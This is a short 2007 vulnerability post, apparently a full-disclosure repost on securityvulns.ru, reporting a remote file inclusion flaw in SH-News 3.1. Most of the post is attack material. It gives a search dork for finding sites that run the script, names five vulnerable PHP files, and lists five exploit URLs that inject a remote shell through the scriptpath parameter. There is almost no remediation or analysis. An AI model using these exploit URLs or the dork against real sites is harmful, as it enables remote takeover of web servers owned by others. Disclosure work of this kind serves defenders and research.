Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] Letterman subscriber module XSS vulnerability

  ByPass In PortalApp

  MIME-tools 5.411 (Entity 5.404)

  Elxis CMS <= 2006.4 - banner module - sql injection

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:15.06.2007
Subject:RFI In Script SH-News 3.1

Found By : Hasadya Raed
Contact : RaeD@BsdMail.Com
---------------------------
Script : SH-News 3.1
Dork : "Powered by SH-News 3.1"
Greetz : Guardian Information Systems
---------------------------
B.Files :
report.php
archive.php
comments.php
init.php
news.php

Exploits :
http://www.Victim.Com/path/report.php?scriptpath=[Shell-Attack]

http://www.Victim.Com/path/archive.php?scriptpath=[Shell-Attack]

http://www.Victim.Com/path/comments.php?scriptpath=[Shell-Attack]

http://www.Victim.Com/path/init.php?scriptpath=[Shell-Attack]

http://www.Victim.Com/path/news.php?scriptpath=[Shell-Attack]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru